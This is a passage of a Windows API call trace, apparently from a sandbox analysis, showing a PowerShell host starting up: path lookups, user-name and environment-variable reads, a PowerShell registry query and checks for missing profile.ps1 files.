	[0793.485] SetErrorMode (uMode=0x1) returned 0x1
	[0793.485] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1cd4f0 | out: lpFileInformation=0x1cd4f0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0793.485] SetErrorMode (uMode=0x1) returned 0x1
	[0793.485] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1cd2f0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0793.485] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1cd1e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0793.486] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1cd2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0793.486] SetErrorMode (uMode=0x1) returned 0x1
	[0793.486] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1cd4f0 | out: lpFileInformation=0x1cd4f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0793.486] SetErrorMode (uMode=0x1) returned 0x1
	[0793.486] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1cd2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0793.486] SetErrorMode (uMode=0x1) returned 0x1
	[0793.486] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1cd4f0 | out: lpFileInformation=0x1cd4f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0793.486] SetErrorMode (uMode=0x1) returned 0x1
	[0793.486] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1cd2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0793.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x1cd1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0793.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cd2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0793.487] SetErrorMode (uMode=0x1) returned 0x1
	[0793.487] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1cd4f0 | out: lpFileInformation=0x1cd4f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0793.487] SetErrorMode (uMode=0x1) returned 0x1
	[0793.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cd2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0793.487] SetErrorMode (uMode=0x1) returned 0x1
	[0793.487] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1cd4f0 | out: lpFileInformation=0x1cd4f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0793.487] SetErrorMode (uMode=0x1) returned 0x1
	[0793.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cd2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0793.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x1cd1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0793.488] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1cd320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0793.488] SetErrorMode (uMode=0x1) returned 0x1
	[0793.488] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1cd530 | out: lpFileInformation=0x1cd530*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0793.488] SetErrorMode (uMode=0x1) returned 0x1
	[0793.488] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1cd320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0793.488] SetErrorMode (uMode=0x1) returned 0x1
	[0793.488] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1cd530 | out: lpFileInformation=0x1cd530*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0793.488] SetErrorMode (uMode=0x1) returned 0x1
	[0793.488] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1cd330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0793.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x1cd220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0793.489] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cd320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0793.489] SetErrorMode (uMode=0x1) returned 0x1
	[0793.489] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1cd530 | out: lpFileInformation=0x1cd530*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0793.489] SetErrorMode (uMode=0x1) returned 0x1
	[0793.489] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cd320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0793.489] SetErrorMode (uMode=0x1) returned 0x1
	[0793.489] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1cd530 | out: lpFileInformation=0x1cd530*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0793.489] SetErrorMode (uMode=0x1) returned 0x1
	[0793.489] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cd330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0793.489] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x1cd220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0793.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cd590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0793.495] SetErrorMode (uMode=0x1) returned 0x1
	[0793.495] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1cd7f0 | out: lpFileInformation=0x1cd7f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0793.495] SetErrorMode (uMode=0x1) returned 0x1
	[0793.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0793.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0793.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0793.499] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0794.500] CoTaskMemAlloc (cb=0x804) returned 0x28a7b60
	[0794.500] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x28a7b60, nSize=0x1cdb58 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cdb58) returned 0x1
	[0794.501] CoTaskMemFree (pv=0x28a7b60) 
	[0794.501] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0794.501] GetUserNameW (in: lpBuffer=0x371d50, pcbBuffer=0x1cdb98 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cdb98) returned 1
	[0794.501] CoTaskMemFree (pv=0x371d50) 
	[0794.502] ReportEventW (hEventLog=0x1b4b0008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f3bf18*="Available", lpRawData=0x2f3bca8) returned 1
	[0794.595] CoTaskMemAlloc (cb=0x104) returned 0x3c3ff0
	[0794.595] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0794.595] CoTaskMemFree (pv=0x3c3ff0) 
	[0794.596] CoTaskMemAlloc (cb=0x104) returned 0x3c3ff0
	[0794.596] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0794.596] CoTaskMemFree (pv=0x3c3ff0) 
	[0794.600] CoTaskMemAlloc (cb=0x104) returned 0x3c3ff0
	[0794.600] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x3c3ff0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0794.600] CoTaskMemFree (pv=0x3c3ff0) 
	[0794.600] CoTaskMemAlloc (cb=0x104) returned 0x3c3ff0
	[0794.600] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x3c3ff0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0794.600] CoTaskMemFree (pv=0x3c3ff0) 
	[0794.603] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cdb78 | out: phkResult=0x1cdb78*=0x398) returned 0x0
	[0794.603] RegQueryValueExW (in: hKey=0x398, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cdafc, lpData=0x0, lpcbData=0x1cdaf8*=0x0 | out: lpType=0x1cdafc*=0x1, lpData=0x0, lpcbData=0x1cdaf8*=0x56) returned 0x0
	[0794.603] CoTaskMemAlloc (cb=0x5a) returned 0x288f100
	[0794.603] RegQueryValueExW (in: hKey=0x398, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cdacc, lpData=0x288f100, lpcbData=0x1cdac8*=0x56 | out: lpType=0x1cdacc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cdac8*=0x56) returned 0x0
	[0794.603] CoTaskMemFree (pv=0x288f100) 
	[0794.604] RegCloseKey (hKey=0x398) returned 0x0
	[0794.606] CoTaskMemAlloc (cb=0x104) returned 0x3c3ff0
	[0794.606] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0794.606] CoTaskMemFree (pv=0x3c3ff0) 
	[0794.625] CoTaskMemAlloc (cb=0x104) returned 0x3c3ff0
	[0794.625] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0794.625] CoTaskMemFree (pv=0x3c3ff0) 
	[0794.633] CoTaskMemAlloc (cb=0x104) returned 0x3c3ff0
	[0794.633] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0794.634] CoTaskMemFree (pv=0x3c3ff0) 
	[0794.634] CoTaskMemAlloc (cb=0x104) returned 0x3c3ff0
	[0794.634] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0794.634] CoTaskMemFree (pv=0x3c3ff0) 
	[0794.635] CoTaskMemAlloc (cb=0x104) returned 0x3c3ff0
	[0794.635] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0794.635] CoTaskMemFree (pv=0x3c3ff0) 
	[0795.750] CoTaskMemAlloc (cb=0x104) returned 0x3c3ff0
	[0795.750] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0795.755] CoTaskMemFree (pv=0x3c3ff0) 
	[0795.757] CoTaskMemAlloc (cb=0x104) returned 0x3c3ff0
	[0795.757] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0795.757] CoTaskMemFree (pv=0x3c3ff0) 
	[0795.757] CoTaskMemAlloc (cb=0x104) returned 0x3c3ff0
	[0795.757] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0795.758] CoTaskMemFree (pv=0x3c3ff0) 
	[0796.837] CoTaskMemAlloc (cb=0x104) returned 0x3c3ff0
	[0796.837] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0796.837] CoTaskMemFree (pv=0x3c3ff0) 
	[0798.849] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x3c4430
	[0798.851] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x3c4540
	[0801.623] CoTaskMemAlloc (cb=0x104) returned 0x3c4650
	[0801.623] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4650, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0801.623] CoTaskMemFree (pv=0x3c4650) 
	[0801.626] CoTaskMemAlloc (cb=0x104) returned 0x3c4650
	[0801.626] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4650, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0801.626] CoTaskMemFree (pv=0x3c4650) 
	[0801.637] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cdcd8 | out: phkResult=0x1cdcd8*=0x3a4) returned 0x0
	[0801.637] RegQueryValueExW (in: hKey=0x3a4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cdc5c, lpData=0x0, lpcbData=0x1cdc58*=0x0 | out: lpType=0x1cdc5c*=0x1, lpData=0x0, lpcbData=0x1cdc58*=0x56) returned 0x0
	[0801.637] CoTaskMemAlloc (cb=0x5a) returned 0x28aae30
	[0801.637] RegQueryValueExW (in: hKey=0x3a4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cdc2c, lpData=0x28aae30, lpcbData=0x1cdc28*=0x56 | out: lpType=0x1cdc2c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cdc28*=0x56) returned 0x0
	[0801.637] CoTaskMemFree (pv=0x28aae30) 
	[0801.637] RegCloseKey (hKey=0x3a4) returned 0x0
	[0801.637] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cdcd8 | out: phkResult=0x1cdcd8*=0x3a4) returned 0x0
	[0801.637] RegQueryValueExW (in: hKey=0x3a4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cdc5c, lpData=0x0, lpcbData=0x1cdc58*=0x0 | out: lpType=0x1cdc5c*=0x1, lpData=0x0, lpcbData=0x1cdc58*=0x56) returned 0x0
	[0801.637] CoTaskMemAlloc (cb=0x5a) returned 0x28aae30
	[0801.637] RegQueryValueExW (in: hKey=0x3a4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cdc2c, lpData=0x28aae30, lpcbData=0x1cdc28*=0x56 | out: lpType=0x1cdc2c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cdc28*=0x56) returned 0x0
	[0801.638] CoTaskMemFree (pv=0x28aae30) 
	[0801.638] RegCloseKey (hKey=0x3a4) returned 0x0
	[0802.535] CoTaskMemAlloc (cb=0x20c) returned 0x287a300
	[0802.535] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x287a300 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0802.536] CoTaskMemFree (pv=0x287a300) 
	[0802.536] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1cd890, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0802.537] CoTaskMemAlloc (cb=0x20c) returned 0x287a300
	[0802.537] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x287a300 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0802.537] CoTaskMemFree (pv=0x287a300) 
	[0802.537] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1cd890, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0802.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x1cda30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0802.538] SetErrorMode (uMode=0x1) returned 0x1
	[0802.538] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1cdc40 | out: lpFileInformation=0x1cdc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0802.538] SetErrorMode (uMode=0x1) returned 0x1
	[0802.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x1cda30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0802.538] SetErrorMode (uMode=0x1) returned 0x1
	[0802.539] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1cdc40 | out: lpFileInformation=0x1cdc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0802.539] SetErrorMode (uMode=0x1) returned 0x1
	[0802.539] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x1cda30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0802.539] SetErrorMode (uMode=0x1) returned 0x1
	[0802.539] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1cdc40 | out: lpFileInformation=0x1cdc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0802.539] SetErrorMode (uMode=0x1) returned 0x1
	[0802.539] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x1cda30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0802.539] SetErrorMode (uMode=0x1) returned 0x1
	[0802.539] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1cdc40 | out: lpFileInformation=0x1cdc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0802.540] SetErrorMode (uMode=0x1) returned 0x1
	[0802.540] CoTaskMemAlloc (cb=0x104) returned 0x3c4650
	[0802.540] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4650, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.541] CoTaskMemFree (pv=0x3c4650) 
	[0802.541] CoTaskMemAlloc (cb=0x104) returned 0x3c4650
	[0802.541] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4650, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.541] CoTaskMemFree (pv=0x3c4650) 
	[0802.541] CoTaskMemAlloc (cb=0x104) returned 0x3c4650
	[0802.541] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4650, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.542] CoTaskMemFree (pv=0x3c4650) 
	[0802.542] CoTaskMemAlloc (cb=0x104) returned 0x3c4650
	[0802.542] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4650, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.542] CoTaskMemFree (pv=0x3c4650) 
	[0802.543] CoTaskMemAlloc (cb=0x104) returned 0x3c4650
	[0802.543] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4650, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.543] CoTaskMemFree (pv=0x3c4650) 
	[0802.544] CoTaskMemAlloc (cb=0x104) returned 0x3c4650
	[0802.544] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4650, nSize=0x80 | out: lpBuffer="") returned 0x0
